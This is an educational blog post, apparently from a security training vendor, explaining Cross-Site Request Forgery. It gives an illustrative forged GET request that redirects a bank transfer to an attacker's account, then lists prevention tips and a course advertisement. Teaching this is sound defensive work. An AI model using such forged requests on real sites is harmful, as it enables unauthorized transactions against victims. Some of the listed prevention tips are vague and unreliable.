Cross-Site Request Forgery (CSRF) Attack
Cross-Site
Request Forgery (CSRF or XSRF) is an
attack that forces an end-user to execute unwanted operations within a web
service that has previously granted them access. The key component of a CSRF
attack is social engineering. CSRF attacks can:
● Change the target's information in an
application
● Make a transaction
● Change login details and passwords
● Purchase things using the victim's credentials
● Send information using the name of the victim
CSRF Attack Methodology
Attackers generally utilize social engineering platforms to perform CSRF attacks. This misleads the target into clicking a URL that carries an unauthorized, maliciously designed request for a specific web service. When a user hits the link, their web server sends an unauthorized request to the target application for a particular web application for which they have credentials. The application views the new request as an authorized request submitted by the user because it contains the necessary privileges, like user session cookies. As a result, a CSRF attack enables attackers to bypass a web application's authentication process by targeting sites that fail to identify real and fake requests.
CSRF Attack Example
Attackers can trick users
into entering or loading information into a web application in several ways.
● The attacker creates an exploit URL or creates
a code.
● The attacker fakes the target into carrying out the intended action.
An attacker analyzes an
application to make a fake request seem authentic before attacking.
- Using GET request
For Example, a normal GET request for a $150 bank transfer might look like this:
Get http://netbank.com/transfer.do?acct=personA&amount=$150 HTTP/1.1 |
An attacker changes this file so that it transfers $150 to their own account.
Get http://netbank.com/transfer.do?acct=attackersB&amount=$150 HTTP/1.1 |
- Using POST request
When an attacker employs a POST request, the procedure is extremely similar to that of a GET request, with the exception that the victim is employed to carry out the attack. For example, the attacker can deceive the victim into clicking inside a page, and as they do so, the POST request is initiated.
Preventing CSRF Attacks
There are several
effective techniques for both preventing and
mitigating CSRF attacks, including:
● Web applications should be closed while not in
use.
● Keep passwords and usernames secure
● Prevent websites from saving passwords
● Avoid parallel searching when logged into a
website.
● Using an anti-CSRF token
● Use the same-site cookie flag
How can InfosecTrain Help You?
If you are a cybersecurity professional looking to acquire the skills to prevent CSRF attacks, enroll in InfosecTrain’s Web Application Penetration Testing online training course. It will help you gain the knowledge, tools, and strategies required to execute comprehensive web application security tests.